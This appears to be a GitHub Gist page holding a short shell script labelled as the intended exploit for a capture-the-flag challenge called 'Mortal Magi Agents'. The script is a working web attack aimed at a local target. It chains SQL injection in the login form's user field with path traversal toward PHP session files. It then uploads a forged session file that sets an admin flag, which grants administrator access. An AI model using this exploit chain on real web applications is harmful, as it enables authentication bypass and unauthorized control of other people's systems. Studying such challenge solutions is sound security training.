Skip to content

Instantly share code, notes, and snippets.

View shinichikudo1212's full-sized avatar

shinichikudo1212

View GitHub Profile
@ytoku
ytoku / exploit.sh
Last active September 11, 2015 06:56
Mortal Magi Agents: intended exploit
TARGET_URL=http://localhost:10080
PASSWORD=''
HASHED_PASSWORD=$(echo -n $PASSWORD | sha1sum | awk '{print $1}')
COOKIEFILE=$(mktemp)
SESSFILE=$(mktemp)
echo -n 'user|s:1:"a";admin|b:1;' > $SESSFILE
curl -s -c $COOKIEFILE "$TARGET_URL/login.php" -d "signin=&password=$PASSWORD&user=') AND 0 UNION SELECT '', '$HASHED_PASSWORD', '', 0 -- /../../../../../var/lib/php5/sess_" >/dev/null
curl -s -b $COOKIEFILE "$TARGET_URL/index.php?page=settings" -F "file=@$SESSFILE" >/dev/null